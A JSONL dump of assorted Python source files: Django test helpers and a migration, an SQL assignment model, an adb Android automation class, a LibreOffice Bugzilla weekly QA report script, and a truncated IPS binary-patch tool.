(NAME_FIELD, \"TEST\", first_name_type)], location=location, short_code=\"test\", geometry=coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"1234567890\", phone_number_type), (NAME_FIELD, \"Beany\", first_name_type)],\n location, \"rep1\", coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"261332592634\", phone_number_type), (NAME_FIELD, \"Qingshan\", first_name_type)],\n 
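# keyword arguments from here on; the rep1 registration above passes these positionally\n                 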
location=location, short_code=\"rep2\", geometry=coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"4008123123\", phone_number_type), (NAME_FIELD, \"KFC\", first_name_type)],\n location=location, short_code=\"rep4\", geometry=coordinates)\n register(TestDataSenderHelper.manager, REPORTER_ENTITY_TYPE,\n [(MOBILE_NUMBER_FIELD, \"4008123123\", phone_number_type), (NAME_FIELD, \"M K Gandhi\", first_name_type)],\n location=location, short_code=\"del1\", geometry=coordinates)\n\n\ndef register_datasender(manager):\n phone_number_type = create_data_dict(manager, name='Telephone Number', slug='telephone_number',\n primitive_type='string')\n first_name_type = create_data_dict(manager, name='First Name', slug='first_name', primitive_type='string')\n coordinates = {\"type\": \"Point\", \"coordinates\": [-21.0399440737, 45.2363669927]}\n location = [u'Madagascar', u'Menabe', u'Mahabo', u'Beronono']\n register(manager, REPORTER_ENTITY_TYPE, [(MOBILE_NUMBER_FIELD, \"1234567890\", phone_number_type),\n (NAME_FIELD, \"Tester 150411\", first_name_type)], location, \"rep276\",\n coordinates)\n return get_by_short_code_include_voided(manager, \"rep276\", REPORTER_ENTITY_TYPE).id\n","sub_path":"datawinners/project/tests/test_data_sender_helper.py","file_name":"test_data_sender_helper.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"557440520","text":"import models.crud as crud\nfrom models.monkey import Monkey\nfrom models.timeframe import Timeframe\n\n\nclass Assignment(object):\n\n # flds = [\n # 'id', 'employee_id', 'project_id',\n # 'first_month', 'last_month', 'effort', 'notes',\n # ]\n\n def __init__(self, lst):\n self.id = lst[0]\n self.employee_id = lst[1]\n self.project_id = lst[2]\n self.first_month = Monkey(lst[3])\n self.last_month = Monkey(lst[4])\n self.timeframe = Timeframe(self.first_month,self.last_month)\n self.effort = lst[5]\n # self.notes = lst[6]\n self.employee = lst[7] if len(lst) > 7 else None\n self.project = lst[8] if len(lst) > 8 else None\n self.tbl = 'Assignments'\n\n @staticmethod\n def get_all():\n sql = (\"SELECT a.*, e.name AS employee, p.nickname AS project \"\n \"FROM Assignments AS a \"\n \"JOIN Projects AS p ON a.project_id=p.id \"\n \"JOIN Employees AS e ON a.employee_id=e.id\")\n cursor = crud.the_dataset.cxn.cursor()\n cursor.execute(sql)\n rows = cursor.fetchall()\n keys = [row[0] for row in rows]\n rex = {key: prj for (key, prj) in zip(keys, rows)}\n return {asnid: Assignment(asn) for (asnid, asn) in zip(rex.keys(), rex.values())}\n\n @staticmethod\n def get_all_for_prj(prjid):\n sql = (\"SELECT a.*, e.name AS employee, p.nickname AS project \"\n \"FROM Assignments AS a \"\n \"JOIN Projects AS p ON a.project_id=p.id \"\n \"JOIN Employees AS e ON a.employee_id=e.id \"\n \"WHERE a.project_id=:project_id\")\n cursor = crud.the_dataset.cxn.cursor()\n cursor.execute(sql, {'project_id': prjid})\n rows = cursor.fetchall()\n keys = [row[0] for row in rows]\n rex = {key: prj for (key, prj) in zip(keys, rows)}\n return {asnid: Assignment(asn) for (asnid, asn) in zip(rex.keys(), rex.values())}\n\n @staticmethod\n def get_all_for_emp(empid):\n sql = (\"SELECT a.*, e.name AS employee, p.nickname AS project \"\n \"FROM Assignments AS a \"\n \"JOIN Projects AS p ON a.project_id=p.id \"\n \"JOIN Employees AS e ON a.employee_id=e.id \"\n \"WHERE a.employee_id=:employee_id\" )\n cursor = crud.the_dataset.cxn.cursor()\n 
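# named-style binding (:employee_id) leaves the quoting to the DB-API driver\n        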
cursor.execute(sql, {'employee_id': empid})\n        rows = cursor.fetchall()\n        keys = [row[0] for row in rows]\n        rex = {key: emp for (key, emp) in zip(keys, rows)}\n        return {asnid: Assignment(asn) for (asnid, asn) in zip(rex.keys(), rex.values())}\n\n
    def save(self):\n        if self.id:\n            crud.DataSet.update(self)\n        else:\n            crud.DataSet.insert(self)\n\n    def remove(self):\n        crud.DataSet.remove(self)\n\n    @staticmethod\n    def by_project(asn):\n        return asn.project\n\n    @staticmethod\n    def by_employee(asn):\n        return asn.employee\n\n    @staticmethod\n    def filter_by_project(asns, prjid):\n        return [asn for asn in asns.values() if asn.project_id == prjid]\n\n    @staticmethod\n    def filter_by_employee(asns, empid):\n        return [asn for asn in asns.values() if asn.employee_id == empid]\n","sub_path":"models/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"400040992","text":"\"\"\"By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13,\nwe can see that the 6th prime is 13.\n\nWhat is the 10 001st prime number?\"\"\"\nfrom itertools import islice\n\n\ndef main():\n    print(solve(10001))\n\n\ndef solve(number):\n    primes = gen_primes()\n    return list(islice(primes, number - 1, number))[0]\n\n\ndef gen_primes():\n    p = 2\n    yield p\n    primes = [p]\n    while True:\n        p += 1\n        if 0 not in [p % x for x in primes]:\n            primes.append(p)\n            yield p\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"374986059","text":"import sys\nfrom dev.launchmodes import QuietPortableLauncher\n\nnum_clients = 8\n\n\ndef start(cmd_line):\n    QuietPortableLauncher(cmd_line, cmd_line)()\n\n\nstart(\"echo-server.py\")\n\nargs = ' '.join(sys.argv[1:])\n\nfor i in range(num_clients):\n    start(\"echo-client.py {}\".format(args))\n","sub_path":"dev/Internet/Sockets/testecho.py","file_name":"testecho.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"630044609","text":"# -*-coding:utf-8-*-\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport subprocess\r\nimport re\r\nimport sys\r\nimport wmi\r\nimport hashlib\r\nimport shutil\r\nfrom abc import abstractmethod\r\n\r\n\r\n
class androidDevice():\r\n    def __init__(self, device=None):\r\n        \"\"\"\r\n        :param device: adb serial of the phone to operate on\r\n        \"\"\"\r\n        self.device = device\r\n        if self.device is None:\r\n            self.device = androidDevice.conn_device()[0]\r\n        self.config = self.config_device()\r\n\r\n
    # take a screenshot and pull it to the PC\r\n    def pull_screenshot(self):\r\n        os.system('adb -s {0} shell screencap -p /sdcard/autojump.png'.format(self.device))  # send the screencap command to the phone\r\n        os.system('adb -s {0} pull /sdcard/autojump.png ./autojump-{1}.png'.format(self.device, self.device))  # pull the image back to the PC\r\n\r\n
    # tap\r\n    def tap(self, x, y):\r\n        cmd = r'adb -s {0} shell input tap {1} {2}'.format(self.device, x, y)\r\n        pi = os.popen(cmd)\r\n        res = pi.read()\r\n        # print(res)\r\n\r\n
    # swipe\r\n    def swipe(self, start, end):\r\n        cmd = r'adb -s {0} shell input swipe {1} {2} {3} {4}'.format(self.device, int(start[0]), int(start[1]), int(end[0]),\r\n                                                                    int(end[1]))\r\n        pi = os.popen(cmd)\r\n        res = pi.read()\r\n        # print(res)\r\n\r\n
    # pyplot mouse event handler\r\n    @staticmethod\r\n    def onClick(event, config, page):  # record which configured button was just clicked\r\n        ix, iy = event.xdata, event.ydata\r\n        now = (ix, iy)\r\n        
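# event.xdata/ydata are None when the click lands outside the axes\r\n        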
print('now click:', now)\r\n        sys.stdout.flush()\r\n\r\n        for key, value in config[page].items():\r\n            if value is None:\r\n                print('just clicked:', key)\r\n                config[page][key] = now\r\n                break\r\n\r\n        if None not in config[page].values():\r\n            plt.close()  # close the figure that was passed in\r\n\r\n
    # derive the per-machine registration code from the disk serial numbers\r\n    @staticmethod\r\n    def get_disk_Serial():\r\n        c = wmi.WMI()\r\n        disks = []\r\n        for disk in c.Win32_DiskDrive():\r\n            disks.append(disk.SerialNumber.strip())\r\n        return disks\r\n\r\n
    # connect to a device after checking the registration code; kept under a\r\n    # distinct name so it does not shadow the unchecked variant below\r\n    @staticmethod\r\n    def conn_device_with_registration():\r\n        serial = input(\"Enter this machine's registration code: \").strip()\r\n        disks = androidDevice.get_disk_Serial()\r\n        flag = 0\r\n        for disk in disks:\r\n            h1 = hashlib.md5()\r\n            h1.update(bytes(disk + 'migu', encoding='utf-8'))\r\n            if h1.hexdigest()[0:16] == serial:\r\n                flag = 1\r\n                break\r\n        # if flag == 0:\r\n        #     sys.exit(\"\\n\\nInvalid registration code!\")\r\n\r\n
        adb_path = 'C:\\\\Windows\\\\'\r\n        adb_files = ['adb.exe', 'AdbWinApi.dll', 'AdbWinUsbApi.dll']\r\n        for file in adb_files:\r\n            if not os.path.exists(adb_path + file):\r\n                shutil.copyfile('.\\\\adb\\\\' + file, adb_path + file)\r\n\r\n
        cmd = r'adb devices'\r\n        pi = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\r\n        res = str(pi.stdout.read(), encoding='utf-8')\r\n        # pi = os.popen(cmd)\r\n        # res = pi.read()\r\n        print(res)\r\n        device_list = re.findall(r'^[A-Z0-9]+\\b', res, re.M)\r\n        return device_list\r\n\r\n
    # connect to a device: copy the adb binaries into place if needed and\r\n    # list the serials reported by 'adb devices'\r\n    @staticmethod\r\n    def conn_device():\r\n        adb_path = 'C:\\\\Windows\\\\'\r\n        adb_files = ['adb.exe', 'AdbWinApi.dll', 'AdbWinUsbApi.dll']\r\n        for file in adb_files:\r\n            if not os.path.exists(adb_path + file):\r\n                shutil.copyfile('.\\\\adb\\\\' + file, adb_path + file)\r\n\r\n
        cmd = r'adb devices'\r\n        pi = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\r\n        res = str(pi.stdout.read(), encoding='utf-8')\r\n        print(res)\r\n        device_list = re.findall(r'^[A-Z0-9]+\\b', res, re.M)\r\n        return device_list\r\n\r\n
    # button/coordinate configuration (implemented by subclasses)\r\n    @abstractmethod\r\n    def config_device(self):\r\n        pass\r\n\r\n    # automated xxqg routine (implemented by subclasses)\r\n    @abstractmethod\r\n    def play_device(self):\r\n        pass","sub_path":"androidDevice.py","file_name":"androidDevice.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"159307223","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.DataFrame(np.random.randn(10000, 4),\n                    columns=list(\"abcd\"))\nprint(data.head())\ndata = data.cumsum()\ndata.plot()\nplt.show()\n","sub_path":"untitled2/test_plot.py","file_name":"test_plot.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"626062701","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('articles', '0002_entry_comment_count'),\n    ]\n\n    operations = [\n        migrations.RemoveField(\n            model_name='entry',\n            name='categories',\n        ),\n        migrations.AddField(\n            model_name='entry',\n            name='categories',\n            field=models.ForeignKey(related_name='entries', default=1, to='articles.Category'),\n            preserve_default=False,\n        ),\n    ]\n","sub_path":"articles/migrations/0003_auto_20150917_1256.py","file_name":"0003_auto_20150917_1256.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"77003542","text":"#!/usr/bin/env python3\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject 
to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n#\n\nimport common\nimport datetime\n\nreportPeriodDays = 7\n\ndef util_create_statList_weeklyReport():\n return {\n 'created': {'id': [], 'author': []},\n 'still_unconfirmed': [],\n 'unconfirmed': [],\n 'newUsers': {},\n 'comments_count': {},\n 'status_changed': {},\n 'keyword_added': {k: {'id':[], 'author': []} for k in common.keywords_list},\n 'keyword_removed': {k: {'id':[], 'author': []} for k in common.keywords_list},\n 'whiteboard_added': {},\n 'whiteboard_removed': {},\n 'severity_changed': {s: {'id':[], 'author': []} for s in common.severities_list},\n 'priority_changed': {p: {'id':[], 'author': []} for p in common.priorities_list},\n 'system_changed': {p: {'id':[], 'author': []} for p in common.system_list},\n 'metabug_added': {},\n 'metabug_removed': {},\n 'people': {},\n 'metabugAlias': {},\n 'stat': {'oldest': datetime.datetime.now(), 'newest': datetime.datetime(2001, 1, 1)}\n }\n\ndef analyze_bugzilla_weeklyReport(statList, bugzillaData, cfg):\n print(\"Analyzing Bugzilla\\n\", end=\"\", flush=True)\n statNewDate = statList['stat']['newest']\n statOldDate = statList['stat']['oldest']\n\n for key, row in bugzillaData['bugs'].items():\n rowId = row['id']\n\n #Ignore META bugs and deletionrequest bugs.\n if not row['summary'].lower().startswith('[meta]') and row['component'].lower() != 'deletionrequest':\n creationDate = datetime.datetime.strptime(row['creation_time'], \"%Y-%m-%dT%H:%M:%SZ\")\n if creationDate < statOldDate:\n statOldDate = creationDate\n if creationDate > statNewDate:\n statNewDate = creationDate\n\n rowStatus = row['status']\n\n if rowStatus == 'UNCONFIRMED':\n statList['unconfirmed'].append(rowId)\n\n creatorMail = row['creator']\n\n common.util_check_bugzilla_mail(statList, creatorMail, row['creator_detail']['real_name'], creationDate, rowId)\n\n if creationDate >= cfg['reportPeriod']:\n statList['created']['id'].append(rowId)\n statList['created']['author'].append(creatorMail)\n if rowStatus == 'UNCONFIRMED':\n statList['still_unconfirmed'].append(rowId)\n\n rowKeywords = row['keywords']\n\n crashSignature = row['cf_crashreport']\n\n for action in row['history']:\n actionMail = action['who']\n actionDate = datetime.datetime.strptime(action['when'], \"%Y-%m-%dT%H:%M:%SZ\")\n common.util_check_bugzilla_mail(statList, actionMail, '', actionDate, rowId)\n\n # Use these variables in case the status is set before the resolution or viceversa\n newStatus = None\n newResolution = None\n oldStatus = None\n oldResolution = None\n for change in action['changes']:\n if change['field_name'] == 'blocks':\n if change['added']:\n for metabug in change['added'].split(', '):\n\n if actionDate >= cfg['reportPeriod'] and int(metabug) in row['blocks']:\n if metabug not in statList['metabug_added']:\n statList['metabug_added'][metabug] = {'id':[], 'author':[]}\n\n statList['metabug_added'][metabug]['id'].append(rowId)\n statList['metabug_added'][metabug]['author'].append(actionMail)\n\n if change['removed']:\n for metabug in change['removed'].split(', '):\n\n if actionDate >= cfg['reportPeriod'] and int(metabug) not in row['blocks']:\n if metabug not in statList['metabug_removed']:\n statList['metabug_removed'][metabug] = {'id':[], 'author':[]}\n\n statList['metabug_removed'][metabug]['id'].append(rowId)\n statList['metabug_removed'][metabug]['author'].append(actionMail)\n\n if change['field_name'] == 'status':\n 
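# 'status' and 'resolution' arrive as separate change entries within one\n                        # history action; the new*/old* variables pair them back together\n                        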
addedStatus = change['added']\n removedStatus = change['removed']\n\n if removedStatus == 'RESOLVED' or removedStatus == 'VERIFIED':\n if oldResolution:\n removedStatus = removedStatus + \"_\" + oldResolution\n oldResolution = None\n else:\n oldStatus = removedStatus\n\n if addedStatus == 'RESOLVED' or addedStatus == 'VERIFIED':\n if newResolution:\n addedStatus = addedStatus + \"_\" + newResolution\n if actionDate >= cfg['reportPeriod']:\n keyValue = removedStatus + '-' + addedStatus\n if keyValue not in statList['status_changed']:\n statList['status_changed'][keyValue] = {'id':[], 'author':[]}\n statList['status_changed'][keyValue]['id'].append(rowId)\n statList['status_changed'][keyValue]['author'].append(actionMail)\n\n newResolution = None\n else:\n newStatus = addedStatus\n else:\n if removedStatus == 'RESOLVED' or removedStatus == 'VERIFIED':\n newStatus = addedStatus\n else:\n if actionDate >= cfg['reportPeriod']:\n keyValue = removedStatus + '-' + addedStatus\n if keyValue not in statList['status_changed']:\n statList['status_changed'][keyValue] = {'id':[], 'author':[]}\n statList['status_changed'][keyValue]['id'].append(rowId)\n statList['status_changed'][keyValue]['author'].append(actionMail)\n\n elif change['field_name'] == 'resolution':\n addedResolution = change['added']\n removedResolution = change['removed']\n\n if oldStatus:\n removedStatus = oldStatus + \"_\" + removedResolution\n oldStatus = None\n else:\n oldResolution = removedResolution\n\n if newStatus:\n addedStatus = newStatus + \"_\" + addedResolution\n\n if actionDate >= cfg['reportPeriod']:\n keyValue = removedStatus + '-' + addedStatus\n if keyValue not in statList['status_changed']:\n statList['status_changed'][keyValue] = {'id':[], 'author':[]}\n statList['status_changed'][keyValue]['id'].append(rowId)\n statList['status_changed'][keyValue]['author'].append(actionMail)\n\n newStatus = None\n else:\n newResolution = addedResolution\n\n elif change['field_name'] == 'priority':\n newPriority = change['added']\n if actionDate >= cfg['reportPeriod'] and newPriority == row['priority']:\n statList['priority_changed'][newPriority]['id'].append(rowId)\n statList['priority_changed'][newPriority]['author'].append(actionMail)\n\n\n elif change['field_name'] == 'severity':\n newSeverity = change['added']\n if actionDate >= cfg['reportPeriod'] and newSeverity == row['severity']:\n statList['severity_changed'][newSeverity]['id'].append(rowId)\n statList['severity_changed'][newSeverity]['author'].append(actionMail)\n\n elif change['field_name'] == 'keywords':\n keywordsAdded = change['added'].split(\", \")\n for keyword in keywordsAdded:\n if keyword in common.keywords_list:\n\n if actionDate >= cfg['reportPeriod'] and keyword in rowKeywords:\n statList['keyword_added'][keyword]['id'].append(rowId)\n statList['keyword_added'][keyword]['author'].append(actionMail)\n\n keywordsRemoved = change['removed'].split(\", \")\n for keyword in keywordsRemoved:\n if keyword in common.keywords_list:\n\n if actionDate >= cfg['reportPeriod'] and keyword not in rowKeywords:\n statList['keyword_removed'][keyword]['id'].append(rowId)\n statList['keyword_removed'][keyword]['author'].append(actionMail)\n\n elif change['field_name'] == 'whiteboard':\n for whiteboard in change['added'].split(' '):\n if 'backportrequest' in whiteboard.lower():\n\n if actionDate >= cfg['reportPeriod'] and whiteboard in row['whiteboard']:\n if whiteboard not in statList['whiteboard_added']:\n statList['whiteboard_added'][whiteboard] = {'id':[], 'author':[]}\n\n 
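# ids and authors are kept as parallel lists; the per-person 'Done by'\n                                    # tallies in the report are built from the author entries\n                                    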
statList['whiteboard_added'][whiteboard]['id'].append(rowId)\n statList['whiteboard_added'][whiteboard]['author'].append(actionMail)\n\n\n for whiteboard in change['removed'].split(' '):\n if 'backportrequest' in whiteboard.lower():\n\n if actionDate >= cfg['reportPeriod'] and whiteboard not in row['whiteboard']:\n if whiteboard not in statList['whiteboard_removed']:\n statList['whiteboard_removed'][whiteboard] = {'id':[], 'author':[]}\n\n statList['whiteboard_removed'][whiteboard]['id'].append(rowId)\n statList['whiteboard_removed'][whiteboard]['author'].append(actionMail)\n\n elif change['field_name'] == 'op_sys':\n newSystem = change['added']\n\n if actionDate >= cfg['reportPeriod'] and newSystem in row['op_sys']:\n statList['system_changed'][newSystem]['id'].append(rowId)\n statList['system_changed'][newSystem]['author'].append(actionMail)\n\n commentMail = None\n comments = row['comments'][1:]\n for idx, comment in enumerate(comments):\n commentMail = comment['creator']\n commentDate = datetime.datetime.strptime(comment['time'], \"%Y-%m-%dT%H:%M:%SZ\")\n\n common.util_check_bugzilla_mail(statList, commentMail, '', commentDate, rowId)\n\n if commentDate >= cfg['reportPeriod'] and \\\n commentMail != \"libreoffice-commits@lists.freedesktop.org\" and\\\n commentMail != \"qa-admin@libreoffice.org\" and\\\n comment['text'] != 'A polite ping, still working on this bug?':\n if commentMail not in statList['comments_count']:\n statList['comments_count'][commentMail] = 0\n statList['comments_count'][commentMail] += 1\n\n for person in row['cc_detail']:\n email = person['email']\n if commentMail == email or actionMail == email:\n common.util_check_bugzilla_mail(statList, email, person['real_name'])\n\n elif row['summary'].lower().startswith('[meta]'):\n statList['metabugAlias'][rowId] = row['alias']\n\n for k, v in statList['people'].items():\n if not statList['people'][k]['name']:\n statList['people'][k]['name'] = statList['people'][k]['email'].split('@')[0]\n\n if statList['people'][k]['oldest'] >= cfg['reportPeriod']:\n statList['newUsers'][k] = statList['people'][k]\n\n statList['people'][k]['oldest'] = statList['people'][k]['oldest'].strftime(\"%Y-%m-%d\")\n statList['people'][k]['newest'] = statList['people'][k]['newest'].strftime(\"%Y-%m-%d\")\n\n statList['stat']['newest'] = statNewDate.strftime(\"%Y-%m-%d\")\n statList['stat']['oldest'] = statOldDate.strftime(\"%Y-%m-%d\")\n print(\" from \" + statList['stat']['oldest'] + \" to \" + statList['stat']['newest'])\n\ndef util_print_QA_line_weekly(fp, statList, dValue, action, isMetabug=False):\n\n #Replace metabugs keys by aliases\n if isMetabug:\n dValueAux = {}\n for key, value in dValue.items():\n if int(key) in statList['metabugAlias'] and \\\n statList['metabugAlias'][int(key)]:\n dValueAux[statList['metabugAlias'][int(key)][0]] = dValue[key]\n dValue = dValueAux\n\n for key, value in sorted(dValue.items()):\n if value['id']:\n nBugs = len(value['id'])\n if nBugs == 1:\n aux1 = 'bug has'\n aux2 = 'bug'\n else:\n aux1 = \"bugs have\"\n aux2 = 'bugs'\n\n if action == 'added' or action == 'removed':\n aux3 = 'to'\n if action == 'removed':\n aux3 = 'from'\n print((' * \\'{}\\' has been {} {} {} {}.').format(key, action, aux3, nBugs, aux2), file=fp)\n elif action == 'changedStatus':\n statuses = key.replace('_', ' ').split('-')\n print((' * {} {} been changed from \\'{}\\' to \\'{}\\'.').format(nBugs, aux1, statuses[0], statuses[1]), file=fp)\n else:\n print((' * {} {} been changed to \\'{}\\'.').format(nBugs, aux1, key.replace('_', ' ')), 
file=fp)\n\n            common.util_create_short_url(fp, value['id'])\n            # count how often each author appears\n            my_dict = {i: value['author'].count(i) for i in value['author']}\n\n            d_view = [(v, k) for k, v in my_dict.items()]\n\n            d_view.sort(reverse=True)\n            print('\t\t+ Done by:', file=fp)\n\n
            text = \" \"\n            for i1, i2 in d_view:\n                personString = statList['people'][i2]['name'] + ' (' + str(i1) + ')'\n                # Reduce lines to 72 characters, for some reason the emails are cut otherwise\n                if len(text + \" \" + personString) < 72:\n                    text += personString + \", \"\n                else:\n                    print(text, file=fp)\n                    text = \" \" + personString + \", \"\n            if text != \" \":\n                print(text[:-2], file=fp)\n\n            print(file=fp)\n\n
def create_weekly_Report(statList):\n    print('QA report from {} to {}'.format(cfg['reportPeriod'].strftime(\"%Y-%m-%d\"), statList['stat']['newest']))\n    fp = open('/tmp/weekly_report.txt', 'w', encoding='utf-8')\n\n    print('Hello,', file=fp)\n    print(file=fp)\n    print('What has happened in QA in the last {} days?'.format(reportPeriodDays), file=fp)\n    print(file=fp)\n\n
    # count how many bugs each reporter filed\n    my_dict = {i: statList['created']['author'].count(i) for i in statList['created']['author']}\n\n    d_view = [(v, k) for k, v in my_dict.items()]\n\n    print(' * {} bugs have been reported by {} people.'.format(\\\n        len(statList['created']['id']),\n        len(d_view)), file=fp)\n\n    common.util_create_short_url(fp, statList['created']['id'])\n    print(file=fp)\n\n
    d_view.sort(reverse=True)\n    print(' * Top 10 reporters:', file=fp)\n\n    it = 0\n    for i1, i2 in d_view:\n        if it >= 10:\n            break\n        print('\t\t+ ' + statList['people'][i2]['name'] + ' (' + str(i1) + ')', file=fp)\n        it += 1\n\n    print(file=fp)\n\n
    d_view = sorted(statList['comments_count'].items(), key=lambda kv: kv[1], reverse=True)\n\n    print(' * Top 10 commenters:', file=fp)\n\n    it = 0\n    for i in d_view:\n        if it >= 10:\n            break\n        print('\t\t+ ' + statList['people'][i[0]]['name'] + ' (' + str(i[1]) + ')', file=fp)\n        it += 1\n\n
    print(file=fp)\n    print(\" * {} bugs reported haven't been triaged yet.\".format(\\\n        len(statList['still_unconfirmed'])), file=fp)\n\n    common.util_create_short_url(fp, statList['still_unconfirmed'])\n    print(file=fp)\n\n
    print(\" * Total number of unconfirmed bugs: {}\".format(\\\n        len(statList['unconfirmed'])), file=fp)\n    print(file=fp)\n\n    print(' * {} comments have been written by {} people.'.format(\n        sum(statList['comments_count'].values()), len(statList['comments_count'])), file=fp)\n    print(file=fp)\n\n
    print(' * {} new people have signed up to Bugzilla.'.format(len(statList['newUsers'])), file=fp)\n    print(file=fp)\n\n
    if statList['status_changed']:\n        print(\"== STATUSES CHANGED ==\", file=fp)\n        util_print_QA_line_weekly(fp, statList, statList['status_changed'], 'changedStatus')\n\n
    if statList['keyword_added']:\n        print(\"== KEYWORDS ADDED ==\", file=fp)\n        util_print_QA_line_weekly(fp, statList, statList['keyword_added'], 'added')\n\n
    if statList['keyword_removed']:\n        print(\"== KEYWORDS REMOVED ==\", file=fp)\n        util_print_QA_line_weekly(fp, statList, statList['keyword_removed'], 'removed')\n\n
    if statList['whiteboard_added']:\n        print(\"== BACKPORTREQUEST ADDED ==\", file=fp)\n        util_print_QA_line_weekly(fp, statList, statList['whiteboard_added'], 'added')\n\n
    if statList['whiteboard_removed']:\n        print(\"== BACKPORTREQUEST REMOVED ==\", file=fp)\n        util_print_QA_line_weekly(fp, statList, statList['whiteboard_removed'], 'removed')\n\n
    if statList['severity_changed']:\n        print(\"== SEVERITY CHANGED ==\", file=fp)\n        util_print_QA_line_weekly(fp, statList, 
statList['severity_changed'], 'changed')\n\n if statList['priority_changed']:\n print(\"== PRIORITY CHANGED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['priority_changed'], 'changed')\n\n if statList['system_changed']:\n print(\"== SYSTEM CHANGED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['system_changed'], 'changed')\n\n if statList['metabug_added']:\n print(\"== METABUGS ADDED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['metabug_added'], 'added', True)\n\n if statList['metabug_removed']:\n print(\"== METABUG REMOVED ==\", file=fp)\n util_print_QA_line_weekly(fp, statList, statList['metabug_removed'], 'removed', True)\n\n print('Thank you all for making Libreoffice rock!', file=fp)\n print(file=fp)\n print('Generated on {} based on stats from {}. Note: Metabugs are ignored.'.format(\n datetime.datetime.now().strftime(\"%Y-%m-%d\"), statList['stat']['newest']), file=fp)\n print(file=fp)\n print('Regards', file=fp)\n fp.close()\n\ndef runCfg():\n cfg = {}\n cfg['reportPeriod'] = common.util_convert_days_to_datetime(reportPeriodDays)\n\n return cfg\n\nif __name__ == '__main__':\n print(\"Reading and writing data to \" + common.dataDir)\n\n cfg = runCfg()\n\n bugzillaData = common.get_bugzilla()\n\n statList = util_create_statList_weeklyReport()\n\n analyze_bugzilla_weeklyReport(statList, bugzillaData, cfg)\n\n create_weekly_Report(statList)\n\n print('End of report')\n","sub_path":"qa/createWeeklyReport.py","file_name":"createWeeklyReport.py","file_ext":"py","file_size_in_byte":20241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"428915684","text":"#!/usr/bin/env python3\n\nimport struct\nimport argparse\n\ndef create_ips(file1_content, file2_content):\n return Patch.create(file1_content, file2_content).encode()\n\ndef apply_ips(file_content, patch_content):\n patch = Patch(patch_content)\n return patch.apply(file_content)\n\nclass Patch:\n def __init__(self, ips_content=None):\n self.records = []\n if ips_content and ips_content[:5] == b'PATCH' and ips_content[-3:] == b'EOF':\n # trim 'PATCH' from the beginning and 'EOF' from the end.\n ips_ptr = 0\n ips_content = ips_content[5:-3]\n # parse the patches\n while (ips_ptr < len(ips_content)):\n record_meta = struct.unpack_from(\">BHH\", ips_content, ips_ptr)\n ips_ptr += 5\n record_addr = record_meta[0] << 16 | record_meta[1]\n record_size = record_meta[2]\n if record_size:\n record_content = struct.unpack_from(\"B\" * record_size, ips_content, \n ips_ptr)\n ips_ptr += record_size\n self.records.append(Record(record_addr, record_content))\n else: #run length encoded\n record_size = struct.unpack_from(\">H\", ips_content, ips_ptr)[0]\n ips_ptr += 2\n record_content = struct.unpack_from(\"B\", ips_content, ips_ptr)[0]\n ips_ptr += 1\n self.records.append(Record(record_addr, record_content, record_size))\n \n def apply(self, orig_content):\n if not isinstance(orig_content, bytearray):\n orig_content = bytearray(orig_content)\n for record in self.records:\n record.apply(orig_content)\n return orig_content\n\n def encode(self):\n encoded = b''.join([r.encode() for r in self.records])\n return b''.join((b'PATCH', encoded, b'EOF'))\n\n def add_record(self, address, content, rle_size=None):\n for r in self.records:\n if r.address == address:\n r.set_content(content)\n return\n self.records.append(Record(address, content, rle_size))\n\n def add_records(self, patchdict):\n for addr,value in patchdict.items():\n 
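# add_record() deduplicates by address, replacing existing content in place\n            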
self.add_record(addr, value)\n\n def clear(self):\n self.records = []\n\n def combine(self, patch):\n self.records = self.records + patch.records\n\n @staticmethod\n def create(orig_content, patched_content):\n p = Patch()\n if not len(orig_content) <= len(patched_content):\n raise ValueError(\"Original file is larger than patched file.\")\n diff_start = -1\n diff_end = -1\n for i in range(len(patched_content)):\n if i >= len(orig_content) or not orig_content[i] == patched_content[i]:\n if diff_start < 0:\n diff_start = i\n diff_end = i\n if diff_end >= 0 and (i - diff_end >= 5 or i == len(patched_content) - 1):\n p.add_record(diff_start, patched_content[diff_start:diff_end+1])\n diff_start = -1\n diff_end = -1\n\n return p\n\nclass Record:\n def __init__(self, address, content=None, rle_size=None):\n self.address = address \n self.rle_size = rle_size #RLE records only\n if content is not None:\n self.set_content(content)\n\n def set_addr(self, addr):\n self.address = addr\n\n def set_content(self, content):\n try:\n if len(content) > 1 